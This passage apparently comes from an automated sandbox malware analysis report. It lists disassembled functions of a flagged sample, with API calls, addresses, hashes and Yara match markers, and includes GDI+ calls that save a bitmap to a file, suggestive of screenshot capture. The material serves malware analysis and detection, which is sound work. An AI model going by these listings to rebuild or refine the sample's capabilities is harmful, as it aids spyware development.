                                                                                                        • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                        • Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
                                                                                                        • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                        • Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
                                                                                                        • int.LIBCPMT ref: 004054F0
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004054F9
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040552A
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040555E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243866535-0
                                                                                                        • Opcode ID: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                        • Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
                                                                                                        • Opcode Fuzzy Hash: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                        • Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00405575
                                                                                                        • int.LIBCPMT ref: 0040558C
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00405595
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004055C6
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004055FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243866535-0
                                                                                                        • Opcode ID: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                        • Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
                                                                                                        • Opcode Fuzzy Hash: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                        • Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
                                                                                                        • int.LIBCPMT ref: 00404C32
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                          • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404C3B
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00404C6C
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243866535-0
                                                                                                        • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                        • Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
                                                                                                        • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                        • Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0212C3F7
                                                                                                        • int.LIBCPMT ref: 0212C40E
                                                                                                          • Part of subcall function 0212BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0212BFCA
                                                                                                          • Part of subcall function 0212BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0212BFE4
                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0212C417
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0212C448
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0212C45E
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0212C47C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243866535-0
                                                                                                        • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                        • Instruction ID: 6c7f886e6873a5788599884f52d414e496a248dcf3f245f553e1d623e9a8208b
                                                                                                        • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                        • Instruction Fuzzy Hash: BA11E1728802399FCB14EBA0DC40AFE77B2AF44710F21041AF915B7290DB349A19CFE5
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02124E82
                                                                                                        • int.LIBCPMT ref: 02124E99
                                                                                                          • Part of subcall function 0212BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0212BFCA
                                                                                                          • Part of subcall function 0212BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0212BFE4
                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 02124EA2
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02124ED3
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02124EE9
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02124F07
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 2243866535-0
                                                                                                        • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                        • Instruction ID: 177a51a5a5456cd33c03194bd105ab4544ac10cfa07bfd1b08dd821c50fd5707
                                                                                                        • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                        • Instruction Fuzzy Hash: A511E571D802399FCB24EBA0D840AEE77B2BF04724F240419F814A72D1DB349A18CF94
                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00404E60
                                                                                                          • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
                                                                                                        • __Getcoll.LIBCPMT ref: 00404EBA
                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                        • String ID: \J@
                                                                                                        • API String ID: 1836011271-3870157017
                                                                                                        • Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                        • Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
                                                                                                        • Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                        • Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                        • Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
                                                                                                        • Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                        • Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
                                                                                                        • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pScheduler
                                                                                                        • API String ID: 3657713681-923244539
                                                                                                        • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                        • Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
                                                                                                        • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                        • Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_catchmake_shared
                                                                                                        • String ID: MOC$RCC$f)D
                                                                                                        • API String ID: 3472968176-2775210027
                                                                                                        • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                        • Instruction ID: 84fb84ac024e293e15c4ce3558cc349f134fc05c8c27c81aff22966025161dc6
                                                                                                        • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                        • Instruction Fuzzy Hash: E0F06D70980254CFDB16EF65C444B7C3B7ABF0AF08F868091F5485B260CBB99A54DFA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                        • Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
                                                                                                        • Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                        • Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                        • Instruction ID: be8dcb5603489ef9241e85d2ce78eca9fb2d8d8f7bba963b271f1b82ca7360f5
                                                                                                        • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                        • Instruction Fuzzy Hash: 2771A371D882169BCB258F55C884ABFFB75FF4536CF594229E4196B180DF70CA41CBA0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                        • _free.LIBCMT ref: 00430B3F
                                                                                                        • _free.LIBCMT ref: 00430B56
                                                                                                        • _free.LIBCMT ref: 00430B75
                                                                                                        • _free.LIBCMT ref: 00430B90
                                                                                                        • _free.LIBCMT ref: 00430BA7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3033488037-0
                                                                                                        • Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                        • Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
                                                                                                        • Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                        • Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3033488037-0
                                                                                                        • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                        • Instruction ID: 02a7dd8107bf5c53620d7541d17ab29dd593649ad1dc51668469900c7ccafa7c
                                                                                                        • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                        • Instruction Fuzzy Hash: 2751B232A80618EFDB259F69D841B6AB7F5EF4C724B1405ADEC29D7250E732E901CB80
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                        • Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
                                                                                                        • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                        • Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                        • Instruction ID: bff4ee7f708198bdfc7b365eedab5a0890136347772e17ffb3376748447afc7c
                                                                                                        • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                        • Instruction Fuzzy Hash: C441B032A40324EFCB25DF78C880B5DB7E6EF89714B1545A9D929EB381D731E901CB80
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00436912
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
                                                                                                        • __freea.LIBCMT ref: 0043697E
                                                                                                          • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                        • String ID:
                                                                                                        • API String ID: 313313983-0
                                                                                                        • Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                        • Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
                                                                                                        • Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                        • Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94
                                                                                                        APIs
                                                                                                        • _SpinWait.LIBCONCRT ref: 0041AEDB
                                                                                                          • Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29
                                                                                                        • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
                                                                                                        • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
                                                                                                        • List.LIBCMT ref: 0041AFA4
                                                                                                        • List.LIBCMT ref: 0041AFB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                        • String ID:
                                                                                                        • API String ID: 3281396844-0
                                                                                                        • Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                        • Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
                                                                                                        • Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                        • Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A
                                                                                                        APIs
                                                                                                        • _SpinWait.LIBCONCRT ref: 0213B142
                                                                                                          • Part of subcall function 02131178: _SpinWait.LIBCONCRT ref: 02131190
                                                                                                        • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0213B156
                                                                                                        • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0213B188
                                                                                                        • List.LIBCMT ref: 0213B20B
                                                                                                        • List.LIBCMT ref: 0213B21A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                        • String ID:
                                                                                                        • API String ID: 3281396844-0
                                                                                                        • Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                        • Instruction ID: 54e7e7899a2ea4a8d68473b7b28100514674a2b600966dcc8828861b29fc3c57
                                                                                                        • Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                        • Instruction Fuzzy Hash: 0B317672D89656EFCB16EFA4E9906EDBBB3BF04308F05016AC80577640EB716A14CF90
                                                                                                        APIs
                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
                                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 00402068
                                                                                                        • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
                                                                                                        • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
                                                                                                        • GdiplusShutdown.GDIPLUS(?), ref: 004020D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                        • String ID:
                                                                                                        • API String ID: 2357751836-0
                                                                                                        • Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                        • Instruction ID: 3210944159f0fc98eb109693a3395d5946c9c878d3acb397b58b4dcf5ef0325c
                                                                                                        • Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                                                                        • Instruction Fuzzy Hash: E72171B5A0031AAFCB10DF65DD459AFFBB8FF48741B104036EA02E3290D7759901CBA8
                                                                                                        APIs
                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 02125099
                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 021250AD
                                                                                                          • Part of subcall function 0212BDA4: __EH_prolog3_GS.LIBCMT ref: 0212BDAB
                                                                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 02125112
                                                                                                        • __Getcoll.LIBCPMT ref: 02125121
                                                                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02125131
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                                                                        • String ID:
                                                                                                        • API String ID: 1844465188-0
                                                                                                        • Opcode ID: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                        • Instruction ID: 29b6166f7b0d6da78309d835a7d543cc7f20dfde914b9ab43e0dab7b4788940c
                                                                                                        • Opcode Fuzzy Hash: 44aaa5f46009dce830ee941fe4bea5556b318a4865790ba87b622e4823c10ac4
                                                                                                        • Instruction Fuzzy Hash: 4321A971890328EFDB14EFA0D4947DCBBB2FF50711F50811AE485AB281EB749968CF91
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733
                                                                                                        • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A
                                                                                                          • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
                                                                                                          • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
                                                                                                          • Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
                                                                                                          • Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061
                                                                                                        • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
                                                                                                        • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
                                                                                                        • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041797A
                                                                                                        Memory Dump Source
